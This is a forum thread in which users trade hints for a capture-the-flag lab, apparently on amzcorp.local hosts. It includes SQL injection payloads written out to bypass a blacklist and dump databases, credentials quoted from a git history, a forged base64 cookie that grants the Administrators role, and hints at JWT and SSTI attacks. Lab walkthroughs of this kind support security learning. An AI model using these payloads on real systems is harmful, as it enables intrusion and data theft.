Posts: 23 Threads: 0 Joined: N/A July 27, 2022 at 12:55 AM (July 26, 2022, 01:16 AM)Peter Wrote: Anyone how sqldump To do the SQL injection you can use a very simple payload, just remember to bypass the blacklist using camel case. For example: ' UnIoN SeLeCt 1,2,3,4,5-- -
Then you can add you sql query like this: ' UnIoN SeLeCt @@version,2,3,4,5-- -
A tip here is to use group_concat to dump more than 1 result. For example to dump all the databases names: ' UnIoN SeLeCt group_concat(schema_name),2,3,4,5 FROM information_schema.schemata#
And so on... Posts: 32 Threads: 0 Joined: N/A July 27, 2022 at 12:47 PM (July 15, 2022, 04:10 PM)hacker1111 Wrote: (July 15, 2022, 04:06 PM)fironeDerbert Wrote: (July 15, 2022, 03:59 PM)hacker1111 Wrote: (July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git:
ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')
You can use them like this:
apt-get install awscli
aws configure
enter the creds
aws --endpoint-url http://cloud.amzcorp.local ecs help
these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local
The custom_jwt.py is to get the flag 4 or the flag 3 ?
flag 4
flag 3 is in sql db. dump keys_tbl table Any progress on flag4? Posts: 8 Threads: 0 Joined: N/A (July 16, 2022, 11:09 AM)mceye Wrote: (July 16, 2022, 09:34 AM)fironeDerbert Wrote: Any hint to dump the database ?
line # 521 file name routes.py fullpath is dea918ebb439498bf14e448e65ca960883900254/jobs_portal/apps/home/routes.py . there is a function update_user you can update the user logon to administrator on jobs.amzcorp.local. with .
loging as tyler and use his cookies
{"username":"mceye","email":"[email protected]","role":"Administrators"}
then base64
{"update_user":"eyJ1c2VybmFtZSI6Im1jZXllIiwiZW1haWwiOiJtY2V5ZUBhbXpjb3JwLmxvY2FsIiwicm9sZSI6IkFkbWluaXN0cmF0b3JzIn0="}
The on the search username= paramater is sql injectable.
but it has blacklisted characthers and strings blacklist = ["0x", "**", "ifnull", " or ", "union"]
do it manually like ussing uppercases. How did you view the .git repo to find the plaintext code history? I couldnt do this and I tried multiple tools. Posts: 3 Threads: 0 Joined: N/A July 28, 2022 at 10:31 AM (July 14, 2022, 10:31 AM)kaerbannog Wrote: Found: http://jobs.amzcorp.local/api/v4/status
{
"site_status": [
{
"site": "amzcorp.local",
"status": "OK"
},
{
"site": "jobs.amzcorp.local",
"status": "OK"
},
{
"site": "services.amzcorp.local",
"status": "OK"
},
{
"site": "cloud.amzcorp.local",
"status": "OK"
},
{
"site": "inventory.amzcorp.local",
"status": "OK"
},
{
"site": "workflow.amzcorp.local",
"status": "OK"
},
{
"site": "company-support.amzcorp.local",
"status": "OK"
}
]
}
how found that "/api/v4/status" Posts: 0 Threads: 0 Joined: N/A July 28, 2022 at 10:33 AM Anyone able to share their list of flags so far? Posts: 34 Threads: 0 Joined: N/A July 28, 2022 at 10:40 AM (July 27, 2022, 12:47 PM)F4nny Wrote: (July 15, 2022, 04:10 PM)hacker1111 Wrote: (July 15, 2022, 04:06 PM)fironeDerbert Wrote: (July 15, 2022, 03:59 PM)hacker1111 Wrote: (July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git:
ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')
You can use them like this:
apt-get install awscli
aws configure
enter the creds
aws --endpoint-url http://cloud.amzcorp.local ecs help
these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local
The custom_jwt.py is to get the flag 4 or the flag 3 ?
flag 4
flag 3 is in sql db. dump keys_tbl table
Any progress on flag4? its about ecdsa nonce reuse attack, not very difficult. You can pretty much copy any script from net and modify it a little bit Posts: 32 Threads: 0 Joined: N/A (July 28, 2022, 10:40 AM)philipjphry Wrote: (July 27, 2022, 12:47 PM)F4nny Wrote: (July 15, 2022, 04:10 PM)hacker1111 Wrote: (July 15, 2022, 04:06 PM)fironeDerbert Wrote: (July 15, 2022, 03:59 PM)hacker1111 Wrote: these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local
The custom_jwt.py is to get the flag 4 or the flag 3 ?
flag 4
flag 3 is in sql db. dump keys_tbl table
Any progress on flag4?
its about ecdsa nonce reuse attack, not very difficult. You can pretty much copy any script from net and modify it a little bit Can't find the flag4. Reading files or RCE through ssti raises 500 error. Posts: 70 Threads: 0 Joined: N/A (July 28, 2022, 10:40 AM)philipjphry Wrote: (July 27, 2022, 12:47 PM)F4nny Wrote: (July 15, 2022, 04:10 PM)hacker1111 Wrote: (July 15, 2022, 04:06 PM)fironeDerbert Wrote: (July 15, 2022, 03:59 PM)hacker1111 Wrote: these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local
The custom_jwt.py is to get the flag 4 or the flag 3 ?
flag 4
flag 3 is in sql db. dump keys_tbl table
Any progress on flag4?
its about ecdsa nonce reuse attack, not very difficult. You can pretty much copy any script from net and modify it a little bit Thanks for the tip. I will give it a try now. Posts: 83 Threads: 0 Joined: N/A (July 28, 2022, 10:40 AM)philipjphry Wrote: (July 27, 2022, 12:47 PM)F4nny Wrote: (July 15, 2022, 04:10 PM)hacker1111 Wrote: (July 15, 2022, 04:06 PM)fironeDerbert Wrote: (July 15, 2022, 03:59 PM)hacker1111 Wrote: these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local
The custom_jwt.py is to get the flag 4 or the flag 3 ?
flag 4
flag 3 is in sql db. dump keys_tbl table
Any progress on flag4?
its about ecdsa nonce reuse attack, not very difficult. You can pretty much copy any script from net and modify it a little bit flag 4 is not only about generting jwt token. Did you get the shell ? Posts: 34 Threads: 0 Joined: N/A August 1, 2022 at 2:21 PM (July 30, 2022, 07:40 PM)popex Wrote: (July 28, 2022, 10:40 AM)philipjphry Wrote: (July 27, 2022, 12:47 PM)F4nny Wrote: (July 15, 2022, 04:10 PM)hacker1111 Wrote: (July 15, 2022, 04:06 PM)fironeDerbert Wrote: The custom_jwt.py is to get the flag 4 or the flag 3 ?
flag 4
flag 3 is in sql db. dump keys_tbl table
Any progress on flag4?
its about ecdsa nonce reuse attack, not very difficult. You can pretty much copy any script from net and modify it a little bit
flag 4 is not only about generting jwt token. Did you get the shell ? yeah i've already completed the whole fortress |
